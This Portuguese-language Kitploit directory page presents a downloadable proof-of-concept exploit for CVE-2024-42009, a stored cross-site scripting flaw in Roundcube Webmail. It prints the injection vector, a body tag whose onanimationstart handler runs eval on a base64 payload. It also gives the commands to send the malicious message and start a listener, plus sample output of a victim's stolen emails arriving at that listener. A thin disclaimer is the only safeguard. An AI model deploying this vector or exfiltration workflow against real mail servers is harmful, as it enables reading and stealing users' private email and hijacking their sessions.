Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-42009-PoC — Prova de Conceito de CVE-2024-42009 | Kitploit
Ferramentas/GitHubGitHub/danithehack3r/cve-2024-42009-poc
Ferramentas de PhishingExploraçãoExploração de Aplicações WebExfiltração de DadosAprendizado e EducaçãoSegurança de Email
GitHubdanithehack3r/cve-2024-42009-poc

CVE-2024-42009-PoC

Prova de Conceito de CVE-2024-42009

Ver Repositório
7148há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-42009 PoC: Listener de Captura de E-mail e Exploit XSS no Roundcube Webmail

Visão Geral

Este repositório contém um exploit de prova de conceito (PoC) para CVE-2024-42009, uma vulnerabilidade de Cross-Site Scripting (XSS) armazenada no Roundcube Webmail versão 1.6.7 e outras várias versões. O exploit demonstra como um atacante pode injetar JavaScript malicioso em uma mensagem e aproveitar um problema de desanitização ao analisar o HTML dentro da mensagem, o que pode ser usado para exfiltrar o conteúdo de e-mail da caixa de entrada da vítima neste exemplo ou até mesmo assumir o controle do navegador da vítima.

Detalhes da Vulnerabilidade

Descrição da CVE

Uma vulnerabilidade de Cross-Site Scripting no Roundcube até 1.5.7 e 1.6.x até 1.6.7 permite que um atacante remoto roube e envie e-mails de uma vítima por meio de uma mensagem de e-mail maliciosa que abusa de um problema de desanitização em message_body() em program/actions/mail/show.php.

Explicação do Payload XSS (para este exemplo)

O exploit usa um gatilho de animação CSS para execução do XSS:

root@kitploit:~
<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=eval(atob('BASE64_PAYLOAD')) foo=bar>

O body é analisado como um div, e então precisamos nos adaptar a isso, por isso usamos o atributo onanimationstart para chamar a função eval e executar chamadas JavaScript complexas a partir dele. Para ler mais sobre como o exploit funciona e onde estão as vulnerabilidades no Roundcube, leia este artigo.

Escopo

  • Este exploit foi testado apenas na versão 1.6.7 do Roundcube Webmail
  • A vítima deve abrir a mensagem para ver seu conteúdo
  • Pode falhar se a Política de Segurança de Conteúdo (CSP) estiver configurada corretamente

Uso

Dependências

Instale os pacotes Python necessários:

root@kitploit:~
python3 -m venv venv
python3 -m pip install -r requirements

Argumentos de Linha de Comando

root@kitploit:~
python3 exploit.py -u <TARGET_URL> -r <RECIPIENT_EMAIL> -l <LISTENER_HOST> -p <LISTENER_PORT>
  • URL alvo: Neste caso, estamos usando o endpoint do formulário de contato que lida com mensagens e as encaminha (ex.: http://email.company.local/contact)
  • E-mail do destinatário: Endereço de e-mail válido que receberá a mensagem maliciosa
  • Host do listener: Endereço IP da sua máquina acessível a partir do alvo
  • Porta do listener: Porta disponível para o servidor HTTP (ex.: 4444)

Exemplo de Uso

root@kitploit:~
python3 exploit.py -u http://webmail.target.com/contact -r [email protected] -l 192.168.1.100 -p 4444

Saída Esperada

root@kitploit:~
[*] Crafting payload for http://webmail.target.com/contact with recipient [email protected]
[*] Sending payload to http://webmail.target.com/contact with recipient [email protected]  
[*] Starting HTTP server on port 4444
[+] HTTP server listening on port 4444
[*] Waiting for emails... (Press Ctrl+C to stop manually)
[+] Received 3 emails!

------------------------------------------------------------
📧 EMAIL UID: 1  
------------------------------------------------------------
From: [email protected]
Subject: Quarterly Report
Message:
Please find attached the quarterly financial report...
------------------------------------------------------------

[+] Email exfiltration complete! Shutting down server...
[+] Server stopped successfully!

Referências

Pesquisa de Vulnerabilidade

  • Blog SonarSource: E-mails Governamentais em Risco - Vulnerabilidade Crítica de Cross-Site Scripting no Roundcube Webmail
  • Vídeo de Demonstração do SonarSource

Aviso Legal

⚠️ IMPORTANTE: Esta prova de conceito é fornecida apenas para fins educacionais e de teste autorizados. Use-a com responsabilidade e esta conta não se responsabiliza por quaisquer danos causados por terceiros.

Baixar ferramenta